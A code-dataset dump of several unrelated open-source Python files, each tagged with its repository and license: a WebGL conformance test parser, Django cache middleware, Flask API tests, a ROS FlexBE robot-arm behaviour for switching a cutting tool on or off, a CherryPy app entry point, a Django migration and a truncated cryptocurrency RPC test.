pages.append({
'url': 'file:///' + test,
'script_to_evaluate_on_commit': conformance_harness_script,
'wait_for_javascript_expression': 'webglTestHarness._finished'
})
return page_set.PageSet.FromDict(page_set_dict, conformance_path)
def CreateExpectations(self, page_set):
return webgl_conformance_expectations.WebGLConformanceExpectations()
@staticmethod
def _ParseTests(path, version=None):
test_paths = []
current_dir = os.path.dirname(path)
full_path = os.path.normpath(os.path.join(conformance_path, path))
if not os.path.exists(full_path):
raise Exception('The WebGL conformance test path specified ' +
'does not exist: ' + full_path)
with open(full_path, 'r') as f:
for line in f:
line = line.strip()
if not line:
continue
if line.startswith('//') or line.startswith('#'):
continue
line_tokens = line.split(' ')
i = 0
min_version = None
while i < len(line_tokens):
token = line_tokens[i]
if token == '--min-version':
i += 1
min_version = line_tokens[i]
i += 1
if version and min_version and version < min_version:
continue
test_name = line_tokens[-1]
if '.txt' in test_name:
include_path = os.path.join(current_dir, test_name)
test_paths += WebglConformance._ParseTests(
include_path, version)
else:
test = os.path.join(current_dir, test_name)
test_paths.append(test)
return test_paths
| aospx-kitkat/platform_external_chromium_org | content/test/gpu/gpu_tests/webgl_conformance.py | Python | bsd-3-clause | 4,067 |
"""
Cache middleware. If enabled, each Django-powered page will be cached based on
URL. The canonical way to enable cache middleware is to set
``UpdateCacheMiddleware`` as your first piece of middleware, and
``FetchFromCacheMiddleware`` as the last::
MIDDLEWARE_CLASSES = [
'django.middleware.cache.UpdateCacheMiddleware',
...
'django.middleware.cache.FetchFromCacheMiddleware'
]
This is counter-intuitive, but correct: ``UpdateCacheMiddleware`` needs to run
last during the response phase, which processes middleware bottom-up;
``FetchFromCacheMiddleware`` needs to run last during the request phase, which
processes middleware top-down.
The single-class ``CacheMiddleware`` can be used for some simple sites.
However, if any other piece of middleware needs to affect the cache key, you'll
need to use the two-part ``UpdateCacheMiddleware`` and
``FetchFromCacheMiddleware``. This'll most often happen when you're using
Django's ``LocaleMiddleware``.
More details about how the caching works:
* Only GET or HEAD-requests with status code 200 are cached.
* The number of seconds each page is stored for is set by the "max-age" section
of the response's "Cache-Control" header, falling back to the
CACHE_MIDDLEWARE_SECONDS setting if the section was not found.
* If CACHE_MIDDLEWARE_ANONYMOUS_ONLY is set to True, only anonymous requests
(i.e., those not made by a logged-in user) will be cached. This is a simple
and effective way of avoiding the caching of the Django admin (and any other
user-specific content).
* This middleware expects that a HEAD request is answered with the same response
headers exactly like the corresponding GET request.
* When a hit occurs, a shallow copy of the original response object is returned
from process_request.
* Pages will be cached based on the contents of the request headers listed in
the response's "Vary" header.
* This middleware also sets ETag, Last-Modified, Expires and Cache-Control
headers on the response object.
"""
from django.conf import settings
from django.core.cache import get_cache, DEFAULT_CACHE_ALIAS
from django.utils.cache import get_cache_key, learn_cache_key, patch_response_headers, get_max_age
class UpdateCacheMiddleware(object):
"""
Response-phase cache middleware that updates the cache if the response is
cacheable.
Must be used as part of the two-part update/fetch cache middleware.
UpdateCacheMiddleware must be the first piece of middleware in
MIDDLEWARE_CLASSES so that it'll get called last during the response phase.
"""
def __init__(self):
self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
self.cache = get_cache(self.cache_alias)
def _session_accessed(self, request):
try:
return request.session.accessed
except AttributeError:
return False
def _should_update_cache(self, request, response):
if not hasattr(request, '_cache_update_cache') or not request._cache_update_cache:
return False
# If the session has not been accessed otherwise, we don't want to
# cause it to be accessed here. If it hasn't been accessed, then the
# user's logged-in status has not affected the response anyway.
if self.cache_anonymous_only and self._session_accessed(request):
assert hasattr(request, 'user'), "The Django cache middleware with CACHE_MIDDLEWARE_ANONYMOUS_ONLY=True requires authentication middleware to be installed. Edit your MIDDLEWARE_CLASSES setting to insert 'django.contrib.auth.middleware.AuthenticationMiddleware' before the CacheMiddleware."
if request.user.is_authenticated():
# Don't cache user-variable requests from authenticated users.
return False
return True
def process_response(self, request, response):
"""Sets the cache, if needed."""
if not self._should_update_cache(request, response):
# We don't need to update the cache, just return.
return response
if not response.status_code == 200:
return response
# Try to get the timeout from the "max-age" section of the "Cache-
# Control" header before reverting to using the default cache_timeout
# length.
timeout = get_max_age(response)
if timeout == None:
timeout = self.cache_timeout
elif timeout == 0:
# max-age was set to 0, don't bother caching.
return response
patch_response_headers(response, timeout)
if timeout:
cache_key = learn_cache_key(request, response, timeout, self.key_prefix, cache=self.cache)
if hasattr(response, 'render') and callable(response.render):
response.add_post_render_callback(
lambda r: self.cache.set(cache_key, r, timeout)
)
else:
self.cache.set(cache_key, response, timeout)
return response
class FetchFromCacheMiddleware(object):
"""
Request-phase cache middleware that fetches a page from the cache.
Must be used as part of the two-part update/fetch cache middleware.
FetchFromCacheMiddleware must be the last piece of middleware in
MIDDLEWARE_CLASSES so that it'll get called last during the request phase.
"""
def __init__(self):
self.cache_timeout = settings.CACHE_MIDDLEWARE_SECONDS
self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
self.cache = get_cache(self.cache_alias)
def process_request(self, request):
"""
Checks whether the page is already cached and returns the cached
version if available.
"""
if not request.method in ('GET', 'HEAD'):
request._cache_update_cache = False
return None # Don't bother checking the cache.
# try and get the cached GET response
cache_key = get_cache_key(request, self.key_prefix, 'GET', cache=self.cache)
if cache_key is None:
request._cache_update_cache = True
return None # No cache information available, need to rebuild.
response = self.cache.get(cache_key, None)
# if it wasn't found and we are looking for a HEAD, try looking just for that
if response is None and request.method == 'HEAD':
cache_key = get_cache_key(request, self.key_prefix, 'HEAD', cache=self.cache)
response = self.cache.get(cache_key, None)
if response is None:
request._cache_update_cache = True
return None # No cache information available, need to rebuild.
# hit, return cached response
request._cache_update_cache = False
return response
class CacheMiddleware(UpdateCacheMiddleware, FetchFromCacheMiddleware):
"""
Cache middleware that provides basic behavior for many simple sites.
Also used as the hook point for the cache decorator, which is generated
using the decorator-from-middleware utility.
"""
def __init__(self, cache_timeout=None, cache_anonymous_only=None, **kwargs):
# We need to differentiate between "provided, but using default value",
# and "not provided". If the value is provided using a default, then
# we fall back to system defaults. If it is not provided at all,
# we need to use middleware defaults.
cache_kwargs = {}
try:
self.key_prefix = kwargs['key_prefix']
if self.key_prefix is not None:
cache_kwargs['KEY_PREFIX'] = self.key_prefix
else:
self.key_prefix = ''
except KeyError:
self.key_prefix = settings.CACHE_MIDDLEWARE_KEY_PREFIX
cache_kwargs['KEY_PREFIX'] = self.key_prefix
try:
self.cache_alias = kwargs['cache_alias']
if self.cache_alias is None:
self.cache_alias = DEFAULT_CACHE_ALIAS
if cache_timeout is not None:
cache_kwargs['TIMEOUT'] = cache_timeout
except KeyError:
self.cache_alias = settings.CACHE_MIDDLEWARE_ALIAS
if cache_timeout is None:
cache_kwargs['TIMEOUT'] = settings.CACHE_MIDDLEWARE_SECONDS
else:
cache_kwargs['TIMEOUT'] = cache_timeout
if cache_anonymous_only is None:
self.cache_anonymous_only = getattr(settings, 'CACHE_MIDDLEWARE_ANONYMOUS_ONLY', False)
else:
self.cache_anonymous_only = cache_anonymous_only
self.cache = get_cache(self.cache_alias, **cache_kwargs)
self.cache_timeout = self.cache.default_timeout
| ychen820/microblog | y/google-cloud-sdk/platform/google_appengine/lib/django-1.3/django/middleware/cache.py | Python | bsd-3-clause | 9,078 |
import operator
from flask import url_for
import pytest
from talkoohakemisto import serializers
from talkoohakemisto.extensions import db
from tests import factories
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityIndex(object):
@pytest.fixture
def municipalities(self):
municipalities = [
factories.MunicipalityFactory(),
factories.MunicipalityFactory(),
]
db.session.commit()
return municipalities
@pytest.fixture
def response(self, client, municipalities):
return client.get(url_for('municipality.index'))
def test_url(self):
assert url_for('municipality.index') == '/municipalities'
def test_returns_200(self, response):
assert response.status_code == 200
def test_response_has_proper_content_type(self, response):
assert response.mimetype == 'application/vnd.api+json'
def test_returns_municipalities_as_json(self, response, municipalities):
serializer = serializers.MunicipalitySerializer(
sorted(municipalities, key=operator.attrgetter('name')),
many=True
)
assert response.json == {
'municipalities': serializer.data
}
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingle(object):
@pytest.fixture
def municipality(self):
municipality = factories.MunicipalityFactory()
db.session.commit()
return municipality
@pytest.fixture
def response(self, client, municipality):
return client.get(url_for('municipality.get', id=municipality.code))
def test_url(self):
assert url_for('municipality.get', id=123) == '/municipalities/123'
def test_returns_200(self, response):
assert response.status_code == 200
def test_response_has_proper_content_type(self, response):
assert response.mimetype == 'application/vnd.api+json'
def test_returns_municipality_as_json(self, response, municipality):
serializer = serializers.MunicipalitySerializer(
[municipality],
many=True
)
assert response.json == {
'municipalities': serializer.data
}
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingleWhenNotFound(object):
@pytest.fixture
def response(self, client):
return client.get(url_for('municipality.get', id=12345))
def test_returns_404(self, response):
assert response.status_code == 404
def test_response_has_proper_content_type(self, response):
assert response.mimetype == 'application/vnd.api+json'
def test_returns_error_as_json(self, response):
assert response.json == {
'message': 'Not found'
}
@pytest.mark.usefixtures('request_ctx', 'database')
class TestMunicipalityGetSingleWithNonIntegerID(object):
@pytest.fixture
def response(self, client):
return client.get('/municipalities/foobar')
def test_returns_404(self, response):
assert response.status_code == 404
def test_response_has_proper_content_type(self, response):
assert response.mimetype == 'application/vnd.api+json'
def test_returns_error_as_json(self, response):
assert response.json == {
'message': 'Not found'
}
| talkoopaiva/talkoohakemisto-api | tests/views/test_municipalities.py | Python | mit | 3,372 |
#!/usr/bin/env python
###########################################################
# WARNING: Generated code! #
# ************************** #
# Manual changes may get lost if file is generated again. #
# Only code inside the [MANUAL] tags will be kept. #
###########################################################
import roslib; roslib.load_manifest('vigir_behavior_trigger_cutting_tool')
from flexbe_core import Behavior, Autonomy, OperatableStateMachine, Logger
from flexbe_states.calculation_state import CalculationState
from vigir_flexbe_states.plan_endeffector_pose_state import PlanEndeffectorPoseState
from vigir_flexbe_states.execute_trajectory_msg_state import ExecuteTrajectoryMsgState
from flexbe_states.decision_state import DecisionState
from vigir_flexbe_states.plan_endeffector_cartesian_waypoints_state import PlanEndeffectorCartesianWaypointsState
from flexbe_states.operator_decision_state import OperatorDecisionState
from vigir_flexbe_states.moveit_predefined_pose_state import MoveitPredefinedPoseState
from vigir_flexbe_states.get_wrist_pose_state import GetWristPoseState
from vigir_flexbe_states.get_pose_in_frame_state import GetPoseInFrameState
from flexbe_states.log_state import LogState
from flexbe_states.flexible_calculation_state import FlexibleCalculationState
# Additional imports can be added inside the following tags
# [MANUAL_IMPORT]
import rospy
import math
import copy
from geometry_msgs.msg import PoseStamped, Pose, Point, Quaternion
from std_msgs.msg import Header
from flexbe_core.proxy import ProxyPublisher
# [/MANUAL_IMPORT]
'''
Created on Tue May 12 2015
@author: Dorothea Koert, Philipp Schillinger
'''
class TriggerCuttingToolSM(Behavior):
'''
Switch the cutting tool on or off.
'''
def __init__(self):
super(TriggerCuttingToolSM, self).__init__()
self.name = 'Trigger Cutting Tool'
# parameters of this behavior
self.add_parameter('hand_side', 'left')
# references to used behaviors
# Additional initialization code can be added inside the following tags
# [MANUAL_INIT]
self._scaling_factor = 0
self._pub1 = rospy.Publisher('/bla1', PoseStamped)
self._pub2 = rospy.Publisher('/bla2', PoseStamped)
# [/MANUAL_INIT]
# Behavior comments:
# O 453 228
# Start spiral again with its origin at the current position
# ! 3 256
# Skip predefined pre_poke_pose for now
def create(self):
number_of_points = 9
scaling_factor = 2 # for spiral pattern
attempts_per_point = 3
arm_controller = ExecuteTrajectoryMsgState.CONTROLLER_LEFT_ARM if self.hand_side == 'left' else ExecuteTrajectoryMsgState.CONTROLLER_RIGHT_ARM
poking_stick_frame = self.hand_side + '_poking_stick'
# x:183 y:40, x:283 y:290
_state_machine = OperatableStateMachine(outcomes=['finished', 'failed'])
_state_machine.userdata.none = None
_state_machine.userdata.hand_side = self.hand_side
# Additional creation code can be added inside the following tags
# [MANUAL_CREATE]
self._scaling_factor = scaling_factor
# [/MANUAL_CREATE]
# x:637 y:484, x:391 y:152
_sm_calculate_poke_poses_0 = OperatableStateMachine(outcomes=['finished', 'failed'], input_keys=['hand_side'], output_keys=['poke_waypoints', 'poke_frame_id', 'pre_poke_waypoints', 'pre_poke_frame_id'])
with _sm_calculate_poke_poses_0:
# x:63 y:78
OperatableStateMachine.add('Get_Current_Endeffector_Pose',
GetWristPoseState(),
transitions={'done': 'Transform_Endeffector_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.Low},
remapping={'hand_side': 'hand_side', 'wrist_pose': 'wrist_pose'})
# x:67 y:178
OperatableStateMachine.add('Transform_Endeffector_Pose',
GetPoseInFrameState(target_frame=poking_stick_frame),
transitions={'done': 'Translate_To_Poke_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'pose_in': 'wrist_pose', 'pose_out': 'pre_poke_pose'})
# x:77 y:278
OperatableStateMachine.add('Translate_To_Poke_Pose',
CalculationState(calculation=self.calc_poke_pose),
transitions={'done': 'Pre_Poke_Pose_To_Waypoints'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'pre_poke_pose', 'output_value': 'poke_pose'})
# x:324 y:378
OperatableStateMachine.add('Poke_Pose_To_Waypoints',
CalculationState(calculation=lambda x: [x.pose]),
transitions={'done': 'Set_Poke_Waypoints_Frame'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'poke_pose', 'output_value': 'poke_waypoints'})
# x:569 y:378
OperatableStateMachine.add('Set_Poke_Waypoints_Frame',
CalculationState(calculation=lambda x: x.header.frame_id),
transitions={'done': 'finished'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'poke_pose', 'output_value': 'poke_frame_id'})
# x:313 y:278
OperatableStateMachine.add('Pre_Poke_Pose_To_Waypoints',
CalculationState(calculation=lambda x: [x.pose]),
transitions={'done': 'Set_Pre_Poke_Waypoints_Frame'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'pre_poke_pose', 'output_value': 'pre_poke_waypoints'})
# x:558 y:278
OperatableStateMachine.add('Set_Pre_Poke_Waypoints_Frame',
CalculationState(calculation=lambda x: x.header.frame_id),
transitions={'done': 'Poke_Pose_To_Waypoints'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'pre_poke_pose', 'output_value': 'pre_poke_frame_id'})
# x:433 y:40, x:441 y:253
_sm_poke_1 = OperatableStateMachine(outcomes=['finished', 'failed'], input_keys=['none', 'hand_side', 'poke_waypoints', 'poke_frame_id', 'pre_poke_waypoints', 'pre_poke_frame_id'])
with _sm_poke_1:
# x:49 y:78
OperatableStateMachine.add('Init_Inner_Index',
CalculationState(calculation=lambda x: 0),
transitions={'done': 'Plan_To_Poke_Pose'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'none', 'output_value': 'poking_index'})
# x:76 y:328
OperatableStateMachine.add('Move_To_Poke_Pose',
ExecuteTrajectoryMsgState(controller=arm_controller),
transitions={'done': 'Plan_To_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
remapping={'joint_trajectory': 'joint_trajectory'})
# x:626 y:378
OperatableStateMachine.add('Move_To_Pre_Poke_Pose',
ExecuteTrajectoryMsgState(controller=arm_controller),
transitions={'done': 'Increase_Inner_Index', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
remapping={'joint_trajectory': 'joint_trajectory'})
# x:636 y:178
OperatableStateMachine.add('Increase_Inner_Index',
CalculationState(calculation=lambda x: x+1),
transitions={'done': 'Check_Inner_Index'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'poking_index', 'output_value': 'poking_index'})
# x:392 y:178
OperatableStateMachine.add('Check_Inner_Index',
DecisionState(outcomes=['continue','finished'], conditions=lambda x: 'continue' if x<attempts_per_point else 'finished'),
transitions={'continue': 'Plan_To_Poke_Pose', 'finished': 'finished'},
autonomy={'continue': Autonomy.Low, 'finished': Autonomy.Low},
remapping={'input_value': 'poking_index'})
# x:46 y:178
OperatableStateMachine.add('Plan_To_Poke_Pose',
PlanEndeffectorCartesianWaypointsState(ignore_collisions=True, include_torso=False, keep_endeffector_orientation=False, allow_incomplete_plans=True, vel_scaling=0.2, planner_id="RRTConnectkConfigDefault"),
transitions={'planned': 'Move_To_Poke_Pose', 'incomplete': 'Move_To_Poke_Pose', 'failed': 'failed'},
autonomy={'planned': Autonomy.Low, 'incomplete': Autonomy.Low, 'failed': Autonomy.High},
remapping={'waypoints': 'poke_waypoints', 'hand': 'hand_side', 'frame_id': 'poke_frame_id', 'joint_trajectory': 'joint_trajectory', 'plan_fraction': 'plan_fraction'})
# x:296 y:428
OperatableStateMachine.add('Plan_To_Pre_Poke_Pose',
PlanEndeffectorCartesianWaypointsState(ignore_collisions=True, include_torso=False, keep_endeffector_orientation=False, allow_incomplete_plans=True, vel_scaling=0.5, planner_id="RRTConnectkConfigDefault"),
transitions={'planned': 'Move_To_Pre_Poke_Pose', 'incomplete': 'Move_To_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'planned': Autonomy.Low, 'incomplete': Autonomy.Low, 'failed': Autonomy.High},
remapping={'waypoints': 'pre_poke_waypoints', 'hand': 'hand_side', 'frame_id': 'pre_poke_frame_id', 'joint_trajectory': 'joint_trajectory', 'plan_fraction': 'plan_fraction'})
with _state_machine:
# x:51 y:78
OperatableStateMachine.add('Init_Index',
CalculationState(calculation=lambda x: 0),
transitions={'done': 'Move_To_Ready_Pose'},
autonomy={'done': Autonomy.High},
remapping={'input_value': 'none', 'output_value': 'attempt_index'})
# x:29 y:278
OperatableStateMachine.add('Prepare_Pre_Poke_Pose',
CalculationState(calculation=self.suggest_pre_poke_pose),
transitions={'done': 'Plan_To_Pre_Poke_Pose'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'none', 'output_value': 'pre_poke_pose'})
# x:28 y:378
OperatableStateMachine.add('Plan_To_Pre_Poke_Pose',
PlanEndeffectorPoseState(ignore_collisions=False, include_torso=False, allowed_collisions=[], planner_id="RRTConnectkConfigDefault"),
transitions={'planned': 'Move_To_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'planned': Autonomy.High, 'failed': Autonomy.Low},
remapping={'target_pose': 'pre_poke_pose', 'hand': 'hand_side', 'joint_trajectory': 'joint_trajectory'})
# x:26 y:478
OperatableStateMachine.add('Move_To_Pre_Poke_Pose',
ExecuteTrajectoryMsgState(controller=arm_controller),
transitions={'done': 'Adjust_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
remapping={'joint_trajectory': 'joint_trajectory'})
# x:344 y:122
OperatableStateMachine.add('Poke',
_sm_poke_1,
transitions={'finished': 'Check_Cutting_Tool_Status', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
remapping={'none': 'none', 'hand_side': 'hand_side', 'poke_waypoints': 'poke_waypoints', 'poke_frame_id': 'poke_frame_id', 'pre_poke_waypoints': 'pre_poke_waypoints', 'pre_poke_frame_id': 'pre_poke_frame_id'})
# x:321 y:28
OperatableStateMachine.add('Check_Cutting_Tool_Status',
OperatorDecisionState(outcomes=['on', 'off', 'reset_iteration'], hint="Is the cutting tool on?", suggestion=None),
transitions={'on': 'finished', 'off': 'Increment_Index', 'reset_iteration': 'Reset_Index'},
autonomy={'on': Autonomy.Full, 'off': Autonomy.Full, 'reset_iteration': Autonomy.Full})
# x:798 y:28
OperatableStateMachine.add('Increment_Index',
CalculationState(calculation=lambda x: x+1),
transitions={'done': 'Calc_Next_Pre_Poke_Pose'},
autonomy={'done': Autonomy.High},
remapping={'input_value': 'attempt_index', 'output_value': 'attempt_index'})
# x:26 y:178
OperatableStateMachine.add('Move_To_Ready_Pose',
MoveitPredefinedPoseState(target_pose=MoveitPredefinedPoseState.POKE_READY_POSE, vel_scaling=0.2, ignore_collisions=False, link_paddings={}),
transitions={'done': 'Adjust_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
remapping={'side': 'hand_side'})
# x:321 y:372
OperatableStateMachine.add('Calculate_Poke_Poses',
_sm_calculate_poke_poses_0,
transitions={'finished': 'Poke', 'failed': 'failed'},
autonomy={'finished': Autonomy.Inherit, 'failed': Autonomy.Inherit},
remapping={'hand_side': 'hand_side', 'poke_waypoints': 'poke_waypoints', 'poke_frame_id': 'poke_frame_id', 'pre_poke_waypoints': 'pre_poke_waypoints', 'pre_poke_frame_id': 'pre_poke_frame_id'})
# x:82 y:578
OperatableStateMachine.add('Adjust_Pre_Poke_Pose',
LogState(text="Adjust pose so that the template is in front of the poking stick", severity=Logger.REPORT_HINT),
transitions={'done': 'Get_Current_Endeffector_Pose'},
autonomy={'done': Autonomy.Full})
# x:601 y:178
OperatableStateMachine.add('Reset_Index',
CalculationState(calculation=lambda x: 0),
transitions={'done': 'Get_Current_Endeffector_Pose'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'attempt_index', 'output_value': 'attempt_index'})
# x:764 y:278
OperatableStateMachine.add('Plan_To_Next_Pre_Poke_Pose',
PlanEndeffectorPoseState(ignore_collisions=False, include_torso=False, allowed_collisions=[], planner_id="RRTConnectkConfigDefault"),
transitions={'planned': 'Move_To_Next_Pre_Poke_Pose', 'failed': 'failed'},
autonomy={'planned': Autonomy.High, 'failed': Autonomy.Low},
remapping={'target_pose': 'pre_poke_pose', 'hand': 'hand_side', 'joint_trajectory': 'joint_trajectory'})
# x:762 y:378
OperatableStateMachine.add('Move_To_Next_Pre_Poke_Pose',
ExecuteTrajectoryMsgState(controller=arm_controller),
transitions={'done': 'Calculate_Poke_Poses', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.High},
remapping={'joint_trajectory': 'joint_trajectory'})
# x:773 y:178
OperatableStateMachine.add('Calc_Next_Pre_Poke_Pose',
FlexibleCalculationState(calculation=self.calc_pre_poke_pose, input_keys=['index', 'init_pre_poke_pose']),
transitions={'done': 'Plan_To_Next_Pre_Poke_Pose'},
autonomy={'done': Autonomy.Off},
remapping={'index': 'attempt_index', 'init_pre_poke_pose': 'init_pre_poke_pose', 'output_value': 'pre_poke_pose'})
# x:563 y:578
OperatableStateMachine.add('Get_Current_Endeffector_Pose',
GetWristPoseState(),
transitions={'done': 'Transform_Endeffector_Pose', 'failed': 'failed'},
autonomy={'done': Autonomy.Low, 'failed': Autonomy.Low},
remapping={'hand_side': 'hand_side', 'wrist_pose': 'wrist_pose'})
# x:317 y:478
OperatableStateMachine.add('Transform_Endeffector_Pose',
GetPoseInFrameState(target_frame=poking_stick_frame),
transitions={'done': 'Calculate_Poke_Poses', 'failed': 'failed'},
autonomy={'done': Autonomy.Off, 'failed': Autonomy.Off},
remapping={'pose_in': 'wrist_pose', 'pose_out': 'init_pre_poke_pose'})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
def suggest_pre_poke_pose(self, none):
pre_poke_pose = PoseStamped()
pre_poke_pose.header.stamp = rospy.Time.now()
pre_poke_pose.header.frame_id = self.hand_side + '_poking_stick'
if self.hand_side == 'left':
pre_poke_pose.pose.orientation = Quaternion(0.606, -0.377, -0.498, -0.491)
pre_poke_pose.pose.position.x = 0.048 + 0.1 # this saves the robot (for testing)
pre_poke_pose.pose.position.y = 0.254
pre_poke_pose.pose.position.z = 0.103
if self.hand_side == 'right':
pre_poke_pose.pose.orientation = Quaternion(0.606, -0.377, -0.498, -0.491) # TODO change to correct orientation
Logger.logwarn('Orientation not correctly set for right arm!')
pre_poke_pose.pose.position.x = 0.048 + 0.1 # this saves the robot (for testing)
pre_poke_pose.pose.position.y = -0.254
pre_poke_pose.pose.position.z = 0.103
return pre_poke_pose
def calc_pre_poke_pose(self, args):
index = args[0]
init_pre_poke_pose = args[1]
goal_pose = PoseStamped()
goal_pose.header.stamp = rospy.Time.now()
goal_pose.header.frame_id = init_pre_poke_pose.header.frame_id
goal_pose.pose.orientation = init_pre_poke_pose.pose.orientation
spiral_idx = math.sqrt(250*idx)
y_offset = 0.02 * spiral_idx * math.cos(0.2 * spiral_idx)
z_offset = 0.02 * spiral_idx * math.sin(0.2 * spiral_idx)
goal_pose.pose.position.x = init_pre_poke_pose.pose.x
goal_pose.pose.position.y = init_pre_poke_pose.pose.y + 0.01 * y_offset * self._scaling_factor
goal_pose.pose.position.z = init_pre_poke_pose.pose.z + 0.01 * z_offset * self._scaling_factor
print goal_pose
return goal_pose
def calc_poke_pose(self, pre_poke_pose):
self._pub1.publish(pre_poke_pose)
poke_pose = copy.deepcopy(pre_poke_pose)
poke_pose.pose.position.x -= 0.1
self._pub2.publish(poke_pose)
return poke_pose
# [/MANUAL_FUNC]
| team-vigir/vigir_behaviors | behaviors/vigir_behavior_trigger_cutting_tool/src/vigir_behavior_trigger_cutting_tool/trigger_cutting_tool_sm.py | Python | bsd-3-clause | 17,004 |
#!/usr/bin/python
# coding=utf-8
# pylint: disable=I0011,C0103,E1101,R0201,R0903
"""
S.H.I.V.A. - Social network History & Information Vault & Analyser
Application entry point
"""
import jinja2
import cherrypy
import platform
from pymongo import MongoClient
from pymongo import ReadPreference
from engine.tools import IgnoreRequestFilter
from engine.tools import secureheaders
cherrypy.tools.secureheaders = cherrypy.Tool(
"before_finalize", secureheaders, priority=60)
from engine.tools import HazelcastSession
cherrypy.lib.sessions.HazelcastSession = HazelcastSession
from engine.modules.auth import Auth
cherrypy.tools.check_login = cherrypy.Tool("before_handler", Auth.check_login)
from engine.modules.heartbeat import Heartbeat
from engine.modules.notes import Notes
from engine.modules.vk import VK
class Application(object):
""" Main application class """
def __init__(self, template_engine, modules):
self.template_engine = template_engine
self.module_list = list()
for module in modules:
setattr(self, module, modules[module])
if modules[module].MODULE_NAME is not None:
item = dict()
item["path"] = module
item["name"] = modules[module].MODULE_NAME
item["instance"] = modules[module]
self.module_list.append(item)
@cherrypy.expose
@cherrypy.tools.check_login()
def index(self):
""" Index """
return self.template_engine.get_template(
"index.html"
).render(
user=cherrypy.session.get("login", None),
generator=platform.node(),
modules=self.module_list
)
def main():
""" Main (entry point) """
template_engine = jinja2.Environment(loader=jinja2.FileSystemLoader(
"/usr/src/app/template"))
mongo = MongoClient(
["mongo1", "mongo2", "mongo3"],
replicaSet="rs0",
read_preference=ReadPreference.PRIMARY_PREFERRED,
readConcernLevel="majority",
w=2, wtimeout=3000, j=True
)
modules = {
"heartbeat": Heartbeat(),
"auth": Auth(template_engine, mongo),
"notes": Notes(template_engine, mongo),
"vk": VK(template_engine, mongo)
}
config = "S.H.I.V.A..conf"
cherrypy.config.update(config)
application = cherrypy.tree.mount(
Application(template_engine, modules),
"/",
config
)
application.log.access_log.addFilter(
IgnoreRequestFilter("GET /heartbeat/index"))
cherrypy.engine.signals.subscribe()
cherrypy.engine.start()
cherrypy.engine.block()
if __name__ == "__main__":
main()
| LifeDJIK/S.H.I.V.A. | containers/shiva/S.H.I.V.A..py | Python | mit | 2,694 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-10 07:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='users',
name='userMail',
field=models.EmailField(default='email@email.com', max_length=254),
),
]
| itucsProject2/Proje1 | home/migrations/0002_users_usermail.py | Python | unlicense | 465 |
#!/usr/bin/env python
# Copyright (c) 2014 The Diamond Core developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
# Exercise the listreceivedbyaddress API
from test_framework import DiamondTestFramework
from diamondrpc.authproxy import AuthServiceProxy, JSONRPCException
from util import *
def get_sub_array_from_array(object_array, to_match):
'''
Finds and returns a sub array from an array of arrays.
to_match should be a unique idetifier of a sub array
'''
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
return item
return []
def check_array_result(object_array, to_match, expected, should_not_find = False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found in object_array
"""
if should_not_find == True:
expected = { }
num_matched = 0
for item in object_array:
all_match = True
for key,value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
for key,value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s"%(str(item), str(key), str(value)))
num_matched = num_matched+1
if num_matched == 0 and should_not_find != True:
raise AssertionError("No objects matched %s"%(str(to_match)))
if num_matched > 0 and should_not_find == True:
raise AssertionError("Objects was matched %s"%(str(to_match)))
class ReceivedByTest(DiamondTestFramework):
def run_test(self, nodes):
'''
listreceivedbyaddress Test
'''
# Send from node 0 to 1
addr = nodes[1].getnewaddress()
txid = nodes[0].sendtoaddress(addr, 0.1)
sync_mempools(nodes)
#Check not listed in listreceivedbyaddress because has 0 confirmations
check_array_result(nodes[1].listreceivedbyaddress(),
{"address":addr},
{ },
True)
#Bury Tx under 10 block so it will be returned by listreceivedbyaddress
nodes[1].setgenerate(True, 10)
sync_blocks(nodes)
check_array_result(nodes[1].listreceivedbyaddress(),
{"address":addr},
{"address":addr, "account":"", "amount":Decimal("0.1"), "confirmations":10, "txids":[txid,]})
#With min confidence < 10
